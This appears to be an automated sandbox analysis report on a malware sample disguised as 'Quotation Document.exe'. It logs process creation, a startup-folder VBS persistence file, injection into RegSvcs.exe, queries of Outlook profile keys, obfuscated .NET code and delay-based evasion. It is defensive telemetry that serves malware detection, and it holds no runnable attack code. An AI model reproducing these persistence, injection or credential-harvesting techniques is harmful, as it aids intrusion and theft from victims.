                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe"
                Source: C:\Users\user\Desktop\Quotation Document.exeProcess created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\Desktop\Quotation Document.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe" Jump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Quotation Document.exeStatic file information: File size 1175717 > 1048576
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: Quotation Document.exeStatic PE information: real checksum: 0xa2135 should be: 0x1258ad
                Source: neophobia.exe.0.drStatic PE information: real checksum: 0xa2135 should be: 0x1258ad
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041C40C push cs; iretd 7_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00423149 push eax; ret 7_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041C50E push cs; iretd 7_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004231C8 push eax; ret 7_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E21D push ecx; ret 7_2_0040E230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041C6BE push ebx; ret 7_2_0041C6BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040BB97 push dword ptr [ecx-75h]; iretd 7_2_0040BBA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02934653 pushfd ; iretd 7_2_02934654
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02931199 pushfd ; ret 7_2_0293119A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F2941 push 8BF08BFDh; iretd 7_2_050F2946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D7A40 push es; ret 7_2_064D7A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D5291 pushad ; iretd 7_2_064D5292
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D73B2 push es; retf 7_2_064D73B4
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'C5u7Car5iGaf5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                Source: C:\Users\user\Desktop\Quotation Document.exeFile created: C:\Users\user\AppData\Local\emboweling\neophobia.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbsJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (8).png
                Source: C:\Users\user\Desktop\Quotation Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeAPI/Special instruction interceptor: Address: 3EC9F34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598794Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598684Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598473Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597358Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597226Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596358Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596248Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596122Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596014Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595650Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594995Jump to behavior
